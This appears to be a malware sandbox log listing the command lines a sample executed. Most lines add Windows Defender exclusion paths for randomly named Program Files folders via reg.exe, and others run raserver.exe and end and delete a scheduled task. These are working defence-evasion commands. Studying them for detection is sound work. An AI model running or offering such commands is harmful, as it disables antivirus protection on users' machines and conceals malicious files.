- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\YOKCRooXUQUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\YOKCRooXUQUn" /t REG_DWORD /d 0 /reg:32
- '<SYSTEM32>\raserver.exe' /offerraupdate
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\NiMTTuEjhYQU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OVKWEdVsAAABC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OVKWEdVsAAABC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OVKWEdVsAAABC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\OVKWEdVsAAABC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\NiMTTuEjhYQU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\NiMTTuEjhYQU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\NiMTTuEjhYQU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "wRWzFVFCbarZy2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "wRWzFVFCbarZy2"